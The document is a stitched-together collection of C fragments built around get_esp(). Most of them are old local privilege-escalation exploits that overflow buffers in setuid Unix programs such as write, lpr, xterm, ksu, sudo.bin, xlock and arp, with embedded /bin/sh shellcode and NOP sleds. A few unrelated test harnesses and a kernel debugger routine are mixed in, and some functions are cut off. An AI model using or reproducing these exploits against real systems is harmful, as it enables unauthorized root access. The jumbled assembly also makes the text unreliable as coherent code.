void main(int argc,char **argv)
{
FILE *fp;
long magic,magicret;
char buf[100],*envi;
int i;
envi = (char *) malloc(1000*sizeof(char));
memset(envi,0x90,1000);
memcpy(envi,"SOR=",4);
memcpy(envi+980-strlen(shell),shell,strlen(shell));
envi[1000]=0;
putenv(envi);
if (argc!=3)
{
magicret = get_esp()+116;
magic = get_esp()-1668;
}
else
{
magicret = get_esp()+atoi(argv[1]);
magic = get_esp()+atoi(argv[2]);
}
memset(buf,0x41,100);
buf[99]=0;
memcpy(buf+91,&magic,4);
for(i=0;i<22;++i) memcpy(buf+(i*4),&magicret,4);
execl("/usr/bin/write","write","root",buf,(char *)0);
}
int main() {
S s;
s.a = 1;
void *esp_before = get_esp();
foo(s);
CHECK_EQ(esp_before, get_esp());
}
int main() {
void *esp_before = get_esp();
S s;
Z z;
z.foo(s);
CHECK_EQ(esp_before, get_esp());
}
int main() {
void *old_esp = get_esp();
Child c;
CHECK_EQ(old_esp, get_esp());
CHECK_EQ(1, base_ctor_calls);
CHECK_EQ(1, middle_ctor_calls);
CHECK_EQ(1, child_ctor_calls);
}
int main() {
void *old_esp;
Child *c = new Child;
old_esp = get_esp();
destroy(c);
CHECK_EQ(old_esp, get_esp());
CHECK_EQ(1, base_left_dtor_calls);
CHECK_EQ(1, base_right_dtor_calls);
CHECK_EQ(1, child_dtor_calls);
CHECK_EQ(1, operator_delete_calls);
}
void
main (int argc, char *argv[])
{
int i;
if (argc > 1)
offset = strtol(argv[1], NULL, 0);
if (argc > 2)
nop = strtoul(argv[2], NULL, 0);
else
nop = 285;
esp = get_esp();
memset(buf, NOP, BUFLEN);
memcpy(buf+nop, shell, strlen(shell));
for (i = nop+strlen(shell); i < BUFLEN-4; i += 4)
*((int *) &buf[i]) = esp+offset;
printf("jumping to 0x%08x (0x%08x offset %d) [nop %d]\n",
esp+offset, esp, offset, nop);
execl("/usr/openwin/bin/kcms_configure", "kcms_configure", "-P", buf,
"foofoo", NULL);
printf("exec failed!\n");
return;
}
int main (int argc, char *argv[]) {
long offset=410;
int nop=64;
int gab=40;
long addr;
char buffer[210];
int i, a, b;
if (argc > 1) offset = strtol(argv[1], NULL, 0);
if (argc > 2) gab = strtol(argv[2], NULL, 0);
if (argc > 3) nop = strtol(argv[2], NULL, 0);
for (a = 0; a <gab; a++)
buffer[a] = 'A';
addr = get_esp() + offset;
buffer[a++] = addr & 0x000000ff;
buffer[a++] = (addr & 0x0000ff00) >> 8;
buffer[a++] = (addr & 0x00ff0000) >> 16;
buffer[a++] = (addr & 0xff000000) >> 24;
for ( ; a < nop; a++)
buffer[a] = 0x90;
for (b = 0; b < strlen(shellcode); b++, a++)
buffer[a] = shellcode[b];
buffer[strlen(buffer)] = '\0';
printf("addr = 0x%x\n", addr);
execl("/usr/bin/lpset", "lpset", "-n", "fns", "-r", buffer,"digit", NULL);
}
void main()
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
int i;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)
*(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
int main(int ac, char **av)
{
char shell[]=
"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
"\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
"\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
"\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
"\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
"\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff";
unsigned long magic = get_esp() + 1180; /* default offset */
unsigned char buf[800];
char *env;
env = (char *) malloc(400*sizeof(char));
memset(env,0x90,400);
memcpy(env+160,shell,strlen(shell));
memcpy(env,"SOR=",4);
buf[399]=0;
putenv(env);
memset(buf,0x41,800);
memcpy(buf+271,&magic,4);
memcpy(buf,"CFTIME=",7);
buf[799]=0;
putenv(buf);
system("/usr/sbin/i86/whodo");
}
int main() {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
addr = get_esp();
buff = malloc(bsize);
egg = malloc(eggsize);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
system("/usr/local/bin/abuse.sdl -datadir $RET");
}
int main(int ac, char **av)
{
char shell[]=
"\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05"
"\xe8\xf9\xff\xff\xff\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2"
"\x50\xb0\x8d\xe8\xe0\xff\xff\xff\x6a\x05\x90\xb0\x17\xe8\xd6\xff\xff\xff"
"\xeb\x1f\x5e\x8d\x1e\x89\x5e\x0b\x29\xc0\x88\x46\x19\x89\x46\x14"
"\x89\x46\x0f\x89\x46\x07\xb0\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18"
"\xe8\xdc\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78\x01\x01\x01\x01\x02\x02"
"\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
unsigned long magic = get_esp() + 0x50; /* default offset */
unsigned char buf[600];
symlink("/bin/ksh","/tmp/xx");
memset(buf,0x90,600);
buf[599]=0;
memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell));
memcpy(buf,"HOME=",5);
memcpy(buf+265,&magic,4);
putenv(buf);
system("/usr/bin/tip 5");
unlink("/tmp/xx");
}
void dump_stack()
{
int a = 0xaabbccdd;
int i = 0;
int *beg;
beg = &a+128;
printf("stack--> esp:0x%x ebp:0x%x &a:0x%x:%d &i:0x%x:%d &beg:0x%x 0x%x\n",
get_esp(),get_ebp(),&a,a,&i,i,&beg,beg);
for(i = 0; i < 128+64; i+=4)
{
printf("0x%x: %08x %08x %08x %08x\n",(int)(beg-i),
*(beg-i),*(beg-i-1),*(beg-i-2),*(beg-i-3));
}
printf("stack--> esp:0x%x ebp:0x%x &a:0x%x:%d &i:0x%x:%d\n",get_esp(),get_ebp(),&a,a,&i,i);
}
void active (int idx,int value)
{
int flag=0x33333333;
int a = 0x44444444;
printf("active--> esp1:0x%x ebp1:0x%x &flag:0x%x\n",get_esp(),get_ebp(),&flag);
dump_stack();
//fflush();
*(&a+idx) = value;
}
int main(int argc, char *argv[]) {
char buff[BUFSIZE];
int nopcount=501, offset=260;
int i;
if (argc > 1) offset = atoi(argv[1]);
if (argc > 2) nopcount = atoi(argv[2]);
memset (buff, 0x90, BUFSIZE);
for (i = nopcount; i < BUFSIZE - 4; i += 4)
*(long *) &buff[i] = get_esp() + offset;
memcpy (buff + (nopcount - strlen (shellcode)), shellcode, strlen
(shellcode));
memcpy (buff, ":", 1);
printf("Addr = 0x%x\n", get_esp() + offset);
execl("/usr/bin/lp", "lp", "-d", buff, "-p", "/tmp/ps_data",NULL);
int main(int argc,char *argv[])
{
int flag1=0x11111111;
int idx,value;
int flag2=0x22222222;
printf("main--> esp1:0x%x ebp1:0x%x &flag1:0x%x &flag2:0x%x\n",
get_esp(),get_ebp(),&flag1,&flag2);
if(argc != 3){
printf("Usage: %s idx value\n",argv[0]);
return -1;
}
idx = atoi(argv[1]);
value = atoi(argv[2]);
printf("main--> idx:%d value:0x%x\n",idx,value);
printf("main--> esp2:0x%x ebp2:0x%x\n",get_esp(),get_ebp());
active(idx,value);
return 0;
}
int main(int argc, char *argv[])
{
int esp=get_esp();
int i,j; char b[LEN];
memset(b,0x90,LEN);
memcpy(b+CODE_OFFSET,shellcode,strlen(shellcode));
*(int *)&b[RET_OFFSET]=esp+JMP_OFFSET;
b[RET_OFFSET+4]=0;
execlp("ksu","ksu","-n",b,NULL);
}
main(int argc, char **argv)
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2"
"\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0"
"\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50"
"\xeb\x18"
"\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02"
"\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04";
int i, ofs=DEFAULT_OFFSET, bs=BUFFER_SIZE;
if(argc>1)
ofs=atoi(argv[1]);
if(argc>2)
bs=atoi(argv[2]);
printf("Using offset of esp + %d (%x)\nBuffer size %d\n",
ofs, get_esp()+ofs, bs);
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, bs-strlen(execshell));
ptr += bs-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL);
}
void main(int argc, char **argv)
{
FILE * pi;
char *buf,*p;
unsigned long *adr;
int i,off;
if(argc < 2)
{
puts("usage, testsyscallexploit \"path_to_testsyscall\" \"optional_offset\"");
exit(-1);
}
if (argc>2)
off=atoi(argv[2]);
else off=4;
printf("using buffer delta:%d\n",off);
if((p = buf = malloc(2268+28+off))==NULL)
exit(-1);
memset(p, 0x90, 2268+off);
p += 2268+off - strlen(shellcode);
for(i = 0; i < strlen(shellcode); i++)
*p++ = shellcode[i];
adr = (long *)p;
for(i = 0; i < 7; i++)
*adr++ = get_esp();
p = (char *)adr;
*p = 0;
pi = popen(argv[1], "w");
if(pi == NULL) {
perror("popen");
exit(-1);
}
*p = '\n';
*(p+1) = '\0';
if(fwrite(buf, strlen(buf), 1, pi)<0)
{
perror("fwrite");
exit(-1);
}
//execl(argv[1], argv[1],buf, NULL);
}
static int
db_esp(struct db_variable *vp, db_expr_t *valuep, int op)
{
if (kdb_frame == NULL)
return (0);
if (op == DB_VAR_GET)
*valuep = get_esp(kdb_frame);
else if (ISPL(kdb_frame->tf_cs))
kdb_frame->tf_esp = *valuep;
return (1);
}
void main(int argc, char *argv[]) {
char *buffer, *ptr, *egg;
long *address_p, addr;
int offset= DEFAULT_OFFSET, bsize= BUFFER_SIZE;
int i, egg_size= EGG_SIZE;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) egg_size = atoi(argv[3]);
if (!(buffer = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(egg_size))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_esp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buffer;
address_p = (long *) (ptr+ALIGN);
for (i = 0; i < bsize; i+=4)
*(address_p++) = addr;
ptr = egg;
for (i = 0; i < egg_size - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buffer[bsize - 1] = '\0'; // '\0' or else there wil be trouble
egg[egg_size - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg); // put our made egg in the env
memcpy(buffer,"HOME=",5);
putenv(buffer); // put our prepared buffer in env
execlp(BINARY,BINARY,0); // execute it
}
int main(int argc,char *argv[]){
char buff[BUFFER];
int x,offset=0;
long address;
if(argc>1) offset=atoi(argv[1]);
address = get_esp() + offset;
fprintf(stderr,"Address: 0x%lx\nOffset: %d\nShellSize: %d\n",address,offset,strlen(shellcode));
for(x=3;x<BUFFER;x+=4) *(int *)&buff[x]=address;
for(x=0;x<(BUFFER-strlen(shellcode));x++) buff[x]=NOP;
memcpy(buff+(BUFFER-strlen(shellcode)),shellcode,strlen(shellcode));
setenv("SHELL",buff,1);
if((execl(PATH,"elm",0)) < 0) fprintf(stderr,"Kurwa Mac! No %s file ?\n",PATH);
return 0;
}
int main (int argc, char *argv[])
{
int i;
if (argc > 1)
offset = strtol(argv[1], NULL, 0);
else
offset = -200;
esp = get_esp();
memset(buf, 0x90, BUFLEN);
memcpy(buf+800, eyecode, strlen(eyecode));
*((int *) &buf[1037]) = esp+offset;
strncpy(&buf[0],"HOME=",5);
putenv(buf);
execl("/usr/openwin/bin/Xsun", "eEye", ":1",NULL);
return;
}
int main()
{
strcpy(s,"HOME=");
s1=s+5;
while(s1<s+260+5-strlen(shellcode))
*(s1++)=NOP;
while(*shellcode)
*(s1++)=*(shellcode++);
*((unsigned long *)s1)=get_esp()-OFS;
printf("Jump to: %p\n",*((long *)s1));
s1+=4;
*s1=0;
putenv(s);
system("bash");
}
main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE, align=DEFAULT_ALIGN;
if (argc>1) bsize=atoi(argv[1]);
if (argc>2) offset=atoi(argv[2]);
if (argc>3) eggsize=atoi(argv[3]);
if (argc>4) align=atoi(argv[4]);
if (!(buff=malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg=malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr=get_esp()-offset;
printf("Using address: 0x%x\n",addr);
ptr=buff;
addr_ptr=(long *)(ptr+align);
for (i=0; i<bsize; i+=4)
*(addr_ptr++)=addr;
ptr=egg;
for (i=0; i<eggsize-strlen(shellcode)-1; i++)
*(ptr++)=NOP;
for (i=0; i<strlen(shellcode); i++)
*(ptr++)=shellcode[i];
buff[bsize-1]='\0';
egg[eggsize-1]='\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"LINUXCONF_LANG=",15);
putenv(buff);
execl("/sbin/linuxconf","linuxconf",NULL);
}
int main (int argc, char *argv[])
{
int i;
if (argc > 1)
offset = strtol(argv[1], NULL, 0);
else
offset = -300;
nop = 600;
esp = get_esp();
memset(buf, 0x90, BUFLEN);
memcpy(buf+600, shell, strlen(shell));
for (i = nop+strlen(shell)+1; i <= BUFLEN-4; i += 4)
*((int *) &buf[i]) = esp+offset;
buf[BUFLEN-1] = '\0';
execl("/usr/openwin/bin/kcms_configure", "eEye",
"-o","-S","X",buf,NULL);
return;
}
main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i;
int ofs = DEFAULT_OFFSET;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
/* fill start of buffer with nops */
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
/* stick asm code into the buffer */
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;
printf("SUDO.BIN exploit coded by _PHANTOM_ 1997\n");
setenv("NLSPATH",buff,1);
execl(PATH_SUDO, "sudo.bin","bash", NULL);
}
int main (int argc, char *argv[])
{
register int i;
if (argc > 1) offset += strtol(argv[1], NULL, 0);
if (argc > 2) nop += strtoul(argv[2], NULL, 0);
esp = get_esp();
memset(buffer, x86_nop, SIZE);
memcpy(buffer+nop, shell, strlen(shell));
for (i = nop+strlen(shell); i < SIZE-4; i += 4)
*((int *) &buffer[i]) = esp+offset;
printf("jmp = [0x%x]\toffset = [%d]\n",esp+offset,offset);
execl("/usr/X/bin/xlock", "xlock", "-name", buffer, NULL);
printf("exec failed!\n");
return 0;
}
int main(int argc, char *argv[])
{
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_esp() - offset;
printf("Using address: 0x%x\n", addr);
printf("buff %x, egg %x\n", buff, egg);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for(i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for(i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
execl("/home/level11/attackme", "attackme", buff, 0);
}
int main(int ac, char **av)
{
char shell[] =
"\xeb\x45\x9a\xff\xff\xff\xff\x07\xff"
"\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46"
"\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0"
"\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52"
"\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff"
"\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08"
"\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b"
"\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8"
"\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x73\x68\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff";
unsigned long magic = 0x8047b78;
unsigned long r = get_esp() + 600;
unsigned char buf[300];
int f;
if (ac == 2)
r += atoi(av[1]);
memset(buf,0x61,sizeof(buf));
memcpy(buf+52,&magic,4);
memcpy(buf+76,&r,4);
f = open("/tmp/ypx",O_CREAT|O_WRONLY,0600);
write(f,"1 2 3 4 ",8);
write(f,buf,sizeof(buf));
close(f);
memset(buf,0x90,sizeof(buf));
memcpy(buf,"LOL=",4);
memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell));
putenv(buf);
system("/usr/sbin/arp -f /tmp/ypx");
unlink("/tmp/ypx");
}
int getEnvAddr(const char* envPtr)
{
int envAddr = NULL;
int retCode = 0;
char* charPtr = (char *) get_esp();
/* Search for the starting address of the environment string for */
/* the specified environment variable */
while((unsigned int) charPtr < (unsigned int) USER_UPPER_MAGIC)
{
retCode = memcmp((unsigned char *) charPtr++, envPtr, 4);
/* Found */
if(retCode == 0)
{
envAddr = (int) (charPtr - 1);
break;
}
}
return envAddr;
}
